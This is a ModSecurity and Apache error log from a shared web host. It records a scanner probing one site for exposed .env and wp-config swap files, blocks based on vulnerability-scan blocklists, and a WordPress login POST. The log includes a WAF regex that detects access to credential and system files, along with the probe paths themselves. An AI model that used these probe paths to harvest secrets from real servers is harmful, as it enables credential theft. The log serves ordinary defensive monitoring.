[Tue May 26 14:49:51.448704 2026] [security2:error] [pid 648203:tid 648434] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTvxwAAAOo"]
[Tue May 26 14:49:51.487887 2026] [security2:error] [pid 648203:tid 648387] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTvzQAAALs"]
[Tue May 26 14:49:51.529639 2026] [security2:error] [pid 648203:tid 648430] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTv0QAAAOY"]
[Tue May 26 14:49:51.534098 2026] [security2:error] [pid 648203:tid 648438] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTv1AAAAO4"]
[Tue May 26 14:49:51.541863 2026] [security2:error] [pid 648203:tid 648339] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTv2gAAAIs"]
[Tue May 26 14:49:51.541928 2026] [security2:error] [pid 648203:tid 648412] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTv3AAAANQ"]
[Tue May 26 14:49:51.544274 2026] [security2:error] [pid 648203:tid 648446] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTv3QAAAPY"]
[Tue May 26 14:49:51.563603 2026] [security2:error] [pid 648203:tid 648344] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTv4AAAAJA"]
[Tue May 26 14:49:51.616974 2026] [security2:error] [pid 648203:tid 648431] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTv4wAAAOc"]
[Tue May 26 14:49:51.667835 2026] [security2:error] [pid 648203:tid 648419] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTv5gAAANs"]
[Tue May 26 14:49:51.699770 2026] [security2:error] [pid 648203:tid 648440] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTv6QAAAPA"]
[Tue May 26 14:49:51.699874 2026] [security2:error] [pid 648203:tid 648380] [client 45.148.10.95:16792] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTv6gAAALQ"]
[Tue May 26 14:49:51.711864 2026] [autoindex:error] [pid 648203:tid 648445] [client 45.148.10.95:0] AH01276: Cannot serve directory /home1/moesartc/public_html/leakyleaks.in/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:49:51.862170 2026] [security2:error] [pid 648203:tid 648386] [client 45.148.10.95:16752] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.wp-config.php.swp"] [unique_id "ahVlt7EQDDtxJNiDrdTwAwAAALo"]
[Tue May 26 14:49:51.865350 2026] [security2:error] [pid 648203:tid 648346] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTv-wAAAJI"]
[Tue May 26 14:49:51.928824 2026] [security2:error] [pid 648203:tid 648391] [client 45.148.10.95:16816] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/ADMIN/.env"] [unique_id "ahVlt7EQDDtxJNiDrdTwDAAAAL8"]
[Tue May 26 14:49:51.934337 2026] [security2:error] [pid 648203:tid 648434] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTwCAAAAOo"]
[Tue May 26 14:49:51.934740 2026] [security2:error] [pid 648203:tid 648398] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTwBwAAAMY"]
[Tue May 26 14:49:52.010240 2026] [security2:error] [pid 648203:tid 648342] [client 45.148.10.95:16792] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/API/.env"] [unique_id "ahVluLEQDDtxJNiDrdTwFAAAAI4"]
[Tue May 26 14:49:52.020747 2026] [security2:error] [pid 648203:tid 648387] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlt7EQDDtxJNiDrdTwEwAAALs"]
[Tue May 26 14:49:52.085213 2026] [security2:error] [pid 648203:tid 648450] [client 45.148.10.95:16680] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVluLEQDDtxJNiDrdTwFQAAAPo"]
[Tue May 26 14:49:52.087258 2026] [security2:error] [pid 648203:tid 648430] [client 45.148.10.95:16798] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVluLEQDDtxJNiDrdTwFgAAAOY"]
[Tue May 26 14:49:52.094344 2026] [security2:error] [pid 648203:tid 648438] [client 45.148.10.95:16600] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVluLEQDDtxJNiDrdTwFwAAAO4"]
[Tue May 26 14:49:52.126577 2026] [security2:error] [pid 648203:tid 648293] [remote 69.171.234.38:61494] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 38.234.171.69.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahVluLEQDDtxJNiDrdTwGwAA6Vk"]
[Tue May 26 14:49:52.199840 2026] [security2:error] [pid 648203:tid 648406] [client 45.148.10.95:54244] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/APP/.env"] [unique_id "ahVluLEQDDtxJNiDrdTwHQAAAM4"]
[Tue May 26 14:49:52.244026 2026] [security2:error] [pid 648203:tid 648338] [client 45.148.10.95:16870] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/Api/.env"] [unique_id "ahVluLEQDDtxJNiDrdTwIAAAAIo"]
[Tue May 26 14:49:52.250596 2026] [security2:error] [pid 648203:tid 648415] [client 45.148.10.95:16700] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/Backend/.env"] [unique_id "ahVluLEQDDtxJNiDrdTwIgAAANc"]
[Tue May 26 14:49:52.254377 2026] [security2:error] [pid 648203:tid 648456] [client 45.148.10.95:16670] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/Be/.env"] [unique_id "ahVluLEQDDtxJNiDrdTwIwAAAQA"]
[Tue May 26 14:49:52.270219 2026] [security2:error] [pid 648203:tid 648392] [client 45.148.10.95:16832] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVluLEQDDtxJNiDrdTwHAAAAMA"]
[Tue May 26 14:49:52.323019 2026] [security2:error] [pid 648203:tid 648389] [client 45.148.10.95:16852] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/BACK/.env"] [unique_id "ahVluLEQDDtxJNiDrdTwJgAAAL0"]
[Tue May 26 14:49:52.332481 2026] [security2:error] [pid 648203:tid 648341] [client 45.148.10.95:16792] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/BACKEND/.env"] [unique_id "ahVluLEQDDtxJNiDrdTwJwAAAI0"]
[Tue May 26 14:49:52.336962 2026] [security2:error] [pid 648203:tid 648409] [client 45.148.10.95:16882] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/BE/.env"] [unique_id "ahVluLEQDDtxJNiDrdTwKQAAANE"]
[Tue May 26 14:49:52.398487 2026] [security2:error] [pid 648203:tid 648427] [client 45.148.10.95:16816] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVluLEQDDtxJNiDrdTwKAAAAOM"]
[Tue May 26 14:49:52.406521 2026] [security2:error] [pid 648203:tid 648366] [client 45.148.10.95:16838] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVluLEQDDtxJNiDrdTwKgAAAKY"]
[Tue May 26 14:49:52.434292 2026] [security2:error] [pid 648203:tid 648426] [client 45.148.10.95:16888] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVluLEQDDtxJNiDrdTwLQAAAOI"]
[Tue May 26 14:49:52.462987 2026] [security2:error] [pid 648203:tid 648378] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVluLEQDDtxJNiDrdTwMQAAALI"]
[Tue May 26 14:49:52.478578 2026] [security2:error] [pid 648203:tid 648372] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVluLEQDDtxJNiDrdTwNAAAAKw"]
[Tue May 26 14:49:52.488435 2026] [security2:error] [pid 648203:tid 648440] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVluLEQDDtxJNiDrdTwNwAAAPA"]
[Tue May 26 14:49:52.531210 2026] [security2:error] [pid 648203:tid 648396] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVluLEQDDtxJNiDrdTwOgAAAMQ"]
[Tue May 26 14:49:52.596603 2026] [security2:error] [pid 648203:tid 648363] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVluLEQDDtxJNiDrdTwPgAAAKM"]
[Tue May 26 14:49:52.639013 2026] [security2:error] [pid 648203:tid 648424] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVluLEQDDtxJNiDrdTwRAAAAOA"]
[Tue May 26 14:49:52.648084 2026] [security2:error] [pid 648203:tid 648368] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVluLEQDDtxJNiDrdTwQwAAAKg"]
[Tue May 26 14:49:52.652006 2026] [security2:error] [pid 648203:tid 648358] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVluLEQDDtxJNiDrdTwRwAAAJ4"]
[Tue May 26 14:49:52.673563 2026] [security2:error] [pid 648203:tid 648348] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVluLEQDDtxJNiDrdTwSgAAAJQ"]
[Tue May 26 14:49:52.704076 2026] [security2:error] [pid 648203:tid 648349] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVluLEQDDtxJNiDrdTwTQAAAJU"]
[Tue May 26 14:49:52.787350 2026] [security2:error] [pid 648203:tid 648340] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVluLEQDDtxJNiDrdTwVQAAAIw"]
[Tue May 26 14:49:52.787731 2026] [security2:error] [pid 648203:tid 648355] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVluLEQDDtxJNiDrdTwWAAAAJs"]
[Tue May 26 14:49:52.793835 2026] [security2:error] [pid 648203:tid 648408] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVluLEQDDtxJNiDrdTwWwAAANA"]
[Tue May 26 14:49:52.831905 2026] [security2:error] [pid 648203:tid 648443] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVluLEQDDtxJNiDrdTwXgAAAPM"]
[Tue May 26 14:49:52.834162 2026] [security2:error] [pid 648203:tid 648373] [client 65.111.0.199:40575] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlt7EQDDtxJNiDrdTv-AAAAK0"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:52.882040 2026] [security2:error] [pid 648203:tid 648365] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVluLEQDDtxJNiDrdTwagAAAKU"]
[Tue May 26 14:49:52.883396 2026] [security2:error] [pid 648203:tid 648369] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVluLEQDDtxJNiDrdTwawAAAKk"]
[Tue May 26 14:49:52.962345 2026] [security2:error] [pid 648203:tid 648357] [client 74.249.173.207:27846] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/an.php"] [unique_id "ahVluLEQDDtxJNiDrdTwdQAAAJ0"]
[Tue May 26 14:49:52.989140 2026] [security2:error] [pid 648203:tid 648372] [client 45.148.10.95:16832] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVluLEQDDtxJNiDrdTwcwAAAKw"]
[Tue May 26 14:49:53.039348 2026] [security2:error] [pid 648203:tid 648451] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVluLEQDDtxJNiDrdTwewAAAPs"]
[Tue May 26 14:49:53.049788 2026] [security2:error] [pid 648203:tid 648337] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVluLEQDDtxJNiDrdTwegAAAIk"]
[Tue May 26 14:49:53.053058 2026] [security2:error] [pid 648203:tid 648447] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVluLEQDDtxJNiDrdTwfgAAAPc"]
[Tue May 26 14:49:53.058953 2026] [security2:error] [pid 648203:tid 648407] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVluLEQDDtxJNiDrdTwggAAAM8"]
[Tue May 26 14:49:53.066812 2026] [security2:error] [pid 648203:tid 648371] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlubEQDDtxJNiDrdTwhQAAAKs"]
[Tue May 26 14:49:53.102668 2026] [security2:error] [pid 648203:tid 648459] [client 45.148.10.95:16798] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlubEQDDtxJNiDrdTwhgAAAQM"]
[Tue May 26 14:49:53.116662 2026] [security2:error] [pid 648203:tid 648421] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlubEQDDtxJNiDrdTwiQAAAN0"]
[Tue May 26 14:49:53.183821 2026] [security2:error] [pid 648203:tid 648404] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlubEQDDtxJNiDrdTwjwAAAMw"]
